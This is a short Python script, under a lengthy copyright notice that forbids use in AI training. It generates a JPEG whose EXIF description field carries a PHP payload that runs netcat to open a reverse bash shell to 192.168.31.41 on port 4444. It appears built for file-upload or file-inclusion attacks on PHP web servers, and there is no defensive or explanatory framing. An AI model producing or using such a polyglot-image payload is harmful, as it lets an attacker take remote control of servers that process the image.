# Intellectual Property © SleepTheGod
# Also known as: ClumsyLulz
# Legal name: Taylor Christian Newsome
# Contact: sleepraps@gmail.com
# All rights reserved.
#
# This source code, all associated files, logic, algorithms,
# and representations constitute the exclusive intellectual
# property of the author.
#
# No license, permission, or rights are granted—express or
# implied—to:
#   - Copy, modify, distribute, publish, or sublicense
#   - Claim authorship or rebrand
#   - Create derivative works in whole or part
#   - Include in datasets, training data, benchmarks, or
#     automated code generation/AI systems
#   - Use for commercial or non-commercial purposes
#   - Circumvent this notice in any form
#
# Any removal, alteration, or misrepresentation of this notice
# or of authorship constitutes infringement of intellectual
# property rights and false designation of origin under
# applicable law.
#
# This applies to all forms of the work, including source code,
# binaries, logic, snippets, transformations, excerpts, or
# outputs generated by automated systems.
#
# Author: SleepTheGod (ClumsyLulz)

from PIL import Image
import piexif

# Create a blank image (e.g., 200x200 pixels with a white background)
image = Image.new('RGB', (200, 200), 'white')

# Define the EXIF data
exif_dict = {
    "0th": {
        270: "<?php system('nc 192.168.31.41 4444 -e /bin/bash'); __halt_compiler(); ?>"
    },
    "Exif": {},
    "GPS": {},
    "1st": {}
}

# Convert the EXIF data to bytes
exif_bytes = piexif.dump(exif_dict)

# Save the image with the EXIF data
image.save("Exif.jpg", exif=exif_bytes)

print("Image generated with EXIF metadata.")
